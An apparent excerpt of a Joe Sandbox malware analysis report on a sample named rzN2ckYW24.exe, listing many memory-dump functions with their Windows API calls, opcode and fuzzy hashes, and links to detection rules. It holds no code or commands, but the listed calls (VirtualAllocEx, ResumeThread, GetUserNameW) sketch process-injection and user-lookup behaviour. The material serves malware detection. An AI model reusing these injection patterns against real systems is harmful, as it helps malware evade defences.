Instruction Fuzzy Hash: DA1114B2D042499FCB10CF9AD444AEEFBF4EB88314F00856AE529A7200C3B5A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B39A10 Relevance: 1.6, APIs: 1, Instructions: 54
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02B39871,00000800,00000000,00000000), ref: 02B39A82

Memory Dump Source

Source File: 00000000.00000002.293555161.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b30000_rzN2ckYW24.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7caa2ef18a12230060bbe96fed2fa5bfb42138a8b186ff571865501e4b4c86a5
Instruction ID: a1f3dadc8fdfaf69e3ac856737224af7667a37a24f3dadd9d507db1111e761bf
Opcode Fuzzy Hash: 7caa2ef18a12230060bbe96fed2fa5bfb42138a8b186ff571865501e4b4c86a5
Instruction Fuzzy Hash: 141126B6D006099FDB10CF9AD444BDEFBF8FB88324F04856AE529A7200C375A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 075F97E8 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 075F9856

Memory Dump Source

Source File: 00000000.00000002.309279593.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75f0000_rzN2ckYW24.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 37492af15331da51026d9ae8272fecac4ee33e8d130da7ddd2012b8d643300d9
Instruction ID: a6726bf63b1be346071eb74ab84e8852187dd31ecec770bc00121282951c91fc
Opcode Fuzzy Hash: 37492af15331da51026d9ae8272fecac4ee33e8d130da7ddd2012b8d643300d9
Instruction Fuzzy Hash: 1D113AB19042499FDF10DFA9C8447EFBBF5EF48324F148429D515A7250C775A954CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 075F9570 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 075F95D2

Memory Dump Source

Source File: 00000000.00000002.309279593.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75f0000_rzN2ckYW24.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 941ad4e8a722f1a8dc4cfaac113cf891e25b4d222668eeaab863d869a2fadcfa
Instruction ID: 2eba28d39d8afd51061a8b09c2d8764d3e58169bb33f128bb9380d8c217a84bf
Opcode Fuzzy Hash: 941ad4e8a722f1a8dc4cfaac113cf891e25b4d222668eeaab863d869a2fadcfa
Instruction Fuzzy Hash: A1113AB1D042488BCB10DFAAC4447EFFBF4AF88224F14842AD519A7240C779A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B39790 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02B397F6

Memory Dump Source

Source File: 00000000.00000002.293555161.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b30000_rzN2ckYW24.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 51da46d3241cf6c6a8e747b165f53fe45a5e38f991100c3811682f7a058687bf
Instruction ID: 6da37635b9707e886ce9fd58492355c72af7b9abe3fd883e8c2b380acbf70ae4
Opcode Fuzzy Hash: 51da46d3241cf6c6a8e747b165f53fe45a5e38f991100c3811682f7a058687bf
Instruction Fuzzy Hash: 341110B6C006498FDB10CF9AD444BDEFBF8EB88324F10846AD829B7640D378A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 077C82A8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 077C8305

Memory Dump Source

Source File: 00000000.00000002.309821721.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77c0000_rzN2ckYW24.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 634dca48d77d9ec8085a192d4b663c970010dbe532152ce95dab6ffd62db6fa1
Instruction ID: 3601559bacfe566679e1e406e17e9502ce9d38775ec3fd6c8411ee5146d82843
Opcode Fuzzy Hash: 634dca48d77d9ec8085a192d4b663c970010dbe532152ce95dab6ffd62db6fa1
Instruction Fuzzy Hash: 7511D3B58002499FDB10DF99D888BDEFBF8EB48324F108419D554A7640D375A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02B3E390 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.293555161.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b30000_rzN2ckYW24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09ac433ce3dba83b887abffd162524113c73ea34db86cc0cab034630976ff1fd
Instruction ID: dbadfbce57cc3fa9765ccec36a12a87e757baabd959ba433e9d09998f7ceeba6
Opcode Fuzzy Hash: 09ac433ce3dba83b887abffd162524113c73ea34db86cc0cab034630976ff1fd
Instruction Fuzzy Hash: FF12DAF16A17468AD310CF55F59E18A3FA1BFE5328B504288E2611AAD4DFB8114ACF8C

Uniqueness

Uniqueness Score: -1.00%

Function 02B3C41C Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.293555161.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b30000_rzN2ckYW24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83e1d13c769cc07bc6442b367d0ad169c2a2404a03f0f234d6f7985540434481
Instruction ID: 1f6d9f770cad55fed23130c0af2eb9feff7cb927926b7fd9ae0d62137e45db00
Opcode Fuzzy Hash: 83e1d13c769cc07bc6442b367d0ad169c2a2404a03f0f234d6f7985540434481
Instruction Fuzzy Hash: AEA17E32E1021ACFCF06DFA5D9445DEBBB6FF84300B1585AAE905BB261EB71A945CF40

Uniqueness

Uniqueness Score: -1.00%

Function 02B3E38A Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.293555161.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b30000_rzN2ckYW24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c275dc2d7804dd6a7a173a05de16e5635f78b427d1d1b45e0f624473fe8a917c
Instruction ID: 483213aa11ccfab40a61720aac438fe2b692254496a4767c239f6bf6ce56c904
Opcode Fuzzy Hash: c275dc2d7804dd6a7a173a05de16e5635f78b427d1d1b45e0f624473fe8a917c
Instruction Fuzzy Hash: 65C11AB1A617458AD710CF65F98E18A3FB1BFE5328F504289E2616B6D0DFB4114ACF88

Uniqueness

Uniqueness Score: -1.00%

Function 075F18D8 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.309279593.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75f0000_rzN2ckYW24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1a654975e0089352d5fdbbd87f9fd8fe2cb48221b2dab805fd45b0ed27ee7eb
Instruction ID: 26c8db3e3cabe3a2a4021f5b2fdeeba8f4d8970b3d82ddebaabcefff144ab0cc
Opcode Fuzzy Hash: c1a654975e0089352d5fdbbd87f9fd8fe2cb48221b2dab805fd45b0ed27ee7eb
Instruction Fuzzy Hash: 1E612870A142498FD748EF6AE855ADEBBF3EFC9204F04C43AD504DB668EF7459058B90

Uniqueness

Uniqueness Score: -1.00%

Function 075F18E8 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.309279593.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75f0000_rzN2ckYW24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba279d62725284977544d2769542123aafb09f3e502ae41c3633bddeac113809
Instruction ID: d846f991b3bf9e3bb1baddc433c4ca07e4d04ae43c14d789b25a9f4711be3d8e
Opcode Fuzzy Hash: ba279d62725284977544d2769542123aafb09f3e502ae41c3633bddeac113809
Instruction Fuzzy Hash: 8E612670A142098FDB48EF6AE855A9EBBF3EFC9304F08C439D504DB668EF7459058B50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rzN2ckYW24.exePID: 6128, Parent PID: 3044COMMON

Execution Graph

Execution Coverage:	25.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1%
Total number of Nodes:	310
Total number of Limit Nodes:	11

Executed Functions

Function 06529408 Relevance: 3.5, Instructions: 3454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.530232972.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6520000_rzN2ckYW24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0b8f56ddad1ec81fa8b40f9cf9a238246bd07db195274d917ee8e920c951540
Instruction ID: c9c5899b5f5c736949fea726b20323b9a76a1b1c5eb96ad06c4475e13ac1a093
Opcode Fuzzy Hash: d0b8f56ddad1ec81fa8b40f9cf9a238246bd07db195274d917ee8e920c951540
Instruction Fuzzy Hash: A3733F71D1071A8ECB50DF68C88469DF7B1FF9A310F15C69AE458A7261EB30AAD4CF81

Uniqueness

Uniqueness Score: -1.00%

Function 05C45880 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 05C45F1B

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: ae140897c0540d64f03061a1c2ea531c237d3bb528871b44b4b9cf2e9a9ad342
Instruction ID: 5ac9e3a01fba16aad39caddb2584650c16ea66d811af7ad5223a115ad7f43ba5
Opcode Fuzzy Hash: ae140897c0540d64f03061a1c2ea531c237d3bb528871b44b4b9cf2e9a9ad342
Instruction Fuzzy Hash: 73510574D102188FDB14CFA9C889BDDBBF1BF48314F15852AE816AB351D7749844CF95

Uniqueness

Uniqueness Score: -1.00%

Function 05C47F60 Relevance: 3.4, APIs: 2, Instructions: 361COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ceec65d3f3fd43bcc0d23a911a5fed76b3f74aef8fe1062936b71a4bdf1f2deb
Instruction ID: 0fe0d691d72ffdc8d84815630a91585332bef80c5a38b0fcccba3d7bf03ba820
Opcode Fuzzy Hash: ceec65d3f3fd43bcc0d23a911a5fed76b3f74aef8fe1062936b71a4bdf1f2deb
Instruction Fuzzy Hash: A412BB78902218CFCB64DF24E89DA9CBBB2BF49306F1045D9D55AA2385CB359EC1CF61

Uniqueness

Uniqueness Score: -1.00%

Function 05C47F81 Relevance: 3.4, APIs: 2, Instructions: 359COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: dc311b8a21e78637591727963bae7c3bc0e5095e36da77670c683ef332b42e69
Instruction ID: 956b0bfa2480f9971ac73fb4699a85ff02295ab61d5a0162e9c55356b50e77c6
Opcode Fuzzy Hash: dc311b8a21e78637591727963bae7c3bc0e5095e36da77670c683ef332b42e69
Instruction Fuzzy Hash: 8B12CB78902218CFCB64DF24E89DA9CBBB2BF49306F1045D9D55AA2385CB359EC1CF61

Uniqueness

Uniqueness Score: -1.00%

Function 05C47FBD Relevance: 3.4, APIs: 2, Instructions: 354COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f2d8b6df18bec099d3b4cde2db39c9ff455921bbf4ead1c335cc59704317756a
Instruction ID: 8b2518e41bcb134fe79b165ff3089f74b6a298b195f23f0e55952e81141a80c3
Opcode Fuzzy Hash: f2d8b6df18bec099d3b4cde2db39c9ff455921bbf4ead1c335cc59704317756a
Instruction Fuzzy Hash: 2502BB78901218CFCB64DF24E89DA9CBBB2BF49306F1045D9D54AA2395CB359EC1CF61

Uniqueness

Uniqueness Score: -1.00%

Function 05C48002 Relevance: 3.3, APIs: 2, Instructions: 347COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 70b5e6420dc619f106b80f0cf0d148b2c7fde5b8b97f3e67307d46bfd7716573
Instruction ID: 7f979e6f6fbad5e38d03d9567d6e09de43709d71a656a25f4579a2c0b3442895
Opcode Fuzzy Hash: 70b5e6420dc619f106b80f0cf0d148b2c7fde5b8b97f3e67307d46bfd7716573
Instruction Fuzzy Hash: 0C02BC78902228CFCB64DF24E89DA9CBBB2BF49305F1045D9D54AA2395CB359EC1CF61

Uniqueness

Uniqueness Score: -1.00%

Function 05C48047 Relevance: 3.3, APIs: 2, Instructions: 340COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 0f3631c34d2ff0f3bef5f026b0a32bfa26b5543727c92d8d526d486fbee4374c
Instruction ID: 763213a1e9b032eb6add46e1dad36cf083c6b02e5c93afa02602ab7f436868eb
Opcode Fuzzy Hash: 0f3631c34d2ff0f3bef5f026b0a32bfa26b5543727c92d8d526d486fbee4374c
Instruction Fuzzy Hash: 0702CB78902228CFCB64DF24E89DA9CBBB2BF49305F1045D9D54AA2395CB359EC1CF61

Uniqueness

Uniqueness Score: -1.00%

Function 05C4808C Relevance: 3.3, APIs: 2, Instructions: 333COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 073e43f7db12d8aa1360b55ded7d7a5715f6712ed2fdf9baa15b49e780c10f8a
Instruction ID: 26d35acb6466bdabf3f9df49727c4d50f3d03acc8f24dd2543de278606c3acf7
Opcode Fuzzy Hash: 073e43f7db12d8aa1360b55ded7d7a5715f6712ed2fdf9baa15b49e780c10f8a
Instruction Fuzzy Hash: 8102CB38906218CFCB64DF24E89DA9CBBB2BF49305F1045D9D54AA2395CB359EC1CF61

Uniqueness

Uniqueness Score: -1.00%

Function 05C480D1 Relevance: 3.3, APIs: 2, Instructions: 324COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 060926caaaeabca00d6578173da39d62e274c6e295bd2c8fbaebbca7ea60a4ae
Instruction ID: 49edf232ac09a78ce5c1ababbe82adf6423680fd13894a59c6df24fbfe76d0c6
Opcode Fuzzy Hash: 060926caaaeabca00d6578173da39d62e274c6e295bd2c8fbaebbca7ea60a4ae
Instruction Fuzzy Hash: 7FF1CB38906218CFCB64DF24E89DA9CBBB2BF49306F1045D9D54AA2395CB359EC1CF61

Uniqueness

Uniqueness Score: -1.00%

Function 05C4810D Relevance: 3.3, APIs: 2, Instructions: 319COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 9052b7c6a3887190b00186be41180e2388f5fd85341eee658a9929e572f73ede
Instruction ID: 0319b4d80f4159dab0e1b9ee7482eb1239c88e03046d51e93994b95a8a4bcd5b
Opcode Fuzzy Hash: 9052b7c6a3887190b00186be41180e2388f5fd85341eee658a9929e572f73ede
Instruction Fuzzy Hash: F3F1CB38906218CFCB64DF24E89DA9CBBB2BF49305F1045D9D54AA2395CB359EC1CF61

Uniqueness

Uniqueness Score: -1.00%

Function 05C48152 Relevance: 3.3, APIs: 2, Instructions: 312COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 50dd7174da703e7e466b2082b0cf9fd0cae12a52b2157249c72f31c9e9a161f8
Instruction ID: 6cc2af45698fd0988618b1f732b0ff18219dbd99e049d47839d756965e6f42a2
Opcode Fuzzy Hash: 50dd7174da703e7e466b2082b0cf9fd0cae12a52b2157249c72f31c9e9a161f8
Instruction Fuzzy Hash: A2F1CB38906228CFCB64DF24E89DA9CBBB2BF49305F1045D9D54AA2385CB359EC1CF61

Uniqueness

Uniqueness Score: -1.00%

Function 05C48197 Relevance: 3.3, APIs: 2, Instructions: 305COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8cab1f83983d979d08412cc9562a5e8318252dd565893f60dd4c53b562050ed4
Instruction ID: 6e045ea99122aeaa1a810f8f9fd97dc3a0fd0b6bf12c8c9cc00cf8524055d3b7
Opcode Fuzzy Hash: 8cab1f83983d979d08412cc9562a5e8318252dd565893f60dd4c53b562050ed4
Instruction Fuzzy Hash: 1CF1CB38906218CFCB64DF64E89DA9CBBB2BF49306F1045D9D54AA2385CB359EC1CF21

Uniqueness

Uniqueness Score: -1.00%

Function 05C481DC Relevance: 3.3, APIs: 2, Instructions: 298COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 0152f26ca579c74a08d786bd5338d3b717986b3f56353d9172f846781cd260c6
Instruction ID: d3b1070bf3b5f5e456554f742fb309043a93d01fdbb2523f5acae354fc68f236
Opcode Fuzzy Hash: 0152f26ca579c74a08d786bd5338d3b717986b3f56353d9172f846781cd260c6
Instruction Fuzzy Hash: A2F1CB38906218CFCB64DF64E89DA9CBBB2BF49305F1045D9D54AA2385CB359EC1CF21

Uniqueness

Uniqueness Score: -1.00%

Function 05C48221 Relevance: 3.3, APIs: 2, Instructions: 289COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8be0216bbef2044dbd8a4c96dbbeda42383a1eaac51a0d793abfcf8517601782
Instruction ID: 3c62ddda2f53df0591273f1db0c580ab1c78e85155d84c920d21119667507e7d
Opcode Fuzzy Hash: 8be0216bbef2044dbd8a4c96dbbeda42383a1eaac51a0d793abfcf8517601782
Instruction Fuzzy Hash: BAE1BB38906218CFCB64DF64E89DA9CBBB2BF49305F1045D9D54AA2385CB359EC5CF21

Uniqueness

Uniqueness Score: -1.00%

Function 05C4825D Relevance: 3.3, APIs: 2, Instructions: 284COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 00cfbab117121bbd3f5d2146b67ee961608cf13c11d1d343f79044bf7fe9cc96
Instruction ID: e51e72ce9d100fea3f2cbbd1d538154a3ec55b58c30c54660d8f4dbc4ea1129e
Opcode Fuzzy Hash: 00cfbab117121bbd3f5d2146b67ee961608cf13c11d1d343f79044bf7fe9cc96
Instruction Fuzzy Hash: D0E1BB38906228CFCB64DF24E89DA9CBBB2BF49305F1045D9D54AA2385CB359EC5CF21

Uniqueness

Uniqueness Score: -1.00%

Function 05C482A2 Relevance: 3.3, APIs: 2, Instructions: 277COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 35e25fc3f850309956d2ea5d5310ade5ce8c2a8760dbc3f978f21bac30a4be53
Instruction ID: 55837284d47a5eab39c23f9c0466e7c5e939f9d14b5b889af27d9ea3710aa5ae
Opcode Fuzzy Hash: 35e25fc3f850309956d2ea5d5310ade5ce8c2a8760dbc3f978f21bac30a4be53
Instruction Fuzzy Hash: 6CE1BB38906228CFCB64DF24E89DA9CBBB2BF49305F1045D9D54AA2385CB359EC5CF21

Uniqueness

Uniqueness Score: -1.00%

Function 05C482E7 Relevance: 3.3, APIs: 2, Instructions: 270COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 14aad821f448c0d2aa50154511685b6e71e3fca6be4f0569688ff51569c918f7
Instruction ID: 016476d93866edf97fed365b4313615a70b84df6d0deba9bacfd17a9efac3c4c
Opcode Fuzzy Hash: 14aad821f448c0d2aa50154511685b6e71e3fca6be4f0569688ff51569c918f7
Instruction Fuzzy Hash: DFE1BB38906268CFCB64DF24D89DA9CBBB2BF49305F1045D9D54AA2385CB399EC5CF21

Uniqueness

Uniqueness Score: -1.00%

Function 05C4832C Relevance: 3.3, APIs: 2, Instructions: 263COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d4d838c4ee2bdae9b29d488cda9297d3d1b41a8811a7e135de1096778bf6fdbd
Instruction ID: 2cf8eb352c033e0e67ef36013144542cdfadd9f734e46b537b1feb031aaa48ae
Opcode Fuzzy Hash: d4d838c4ee2bdae9b29d488cda9297d3d1b41a8811a7e135de1096778bf6fdbd
Instruction Fuzzy Hash: 85D1BB38906258CFCB64DF24D89DA9CBBB2BF45305F1045D9D54AA2345CB359EC5CF21

Uniqueness

Uniqueness Score: -1.00%

Function 05C48371 Relevance: 3.3, APIs: 2, Instructions: 256COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ea5acabe161abe7c2820b190b03c1fbbdeac60b59a6b86b87f3160372916bdf9
Instruction ID: d7b72e0aba57c7a0ff9a348940a60fc2413378d85ba804a09727cae5a6ca8f7a
Opcode Fuzzy Hash: ea5acabe161abe7c2820b190b03c1fbbdeac60b59a6b86b87f3160372916bdf9
Instruction Fuzzy Hash: 81D1BA38906268CFCB64DF24D89DA9CBBB2BF49305F1045D9E54AA2345CB359EC5CF21

Uniqueness

Uniqueness Score: -1.00%

Function 05C483B6 Relevance: 3.2, APIs: 2, Instructions: 249COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b7f17075830edf1fdb0a3a799444c4b5fb2f7d2f8279fce9cc389d7e09e63c22
Instruction ID: f3291f5cfff9c1440d85277b52dd43bd51362aaa89d1762e6aea22013eb00d28
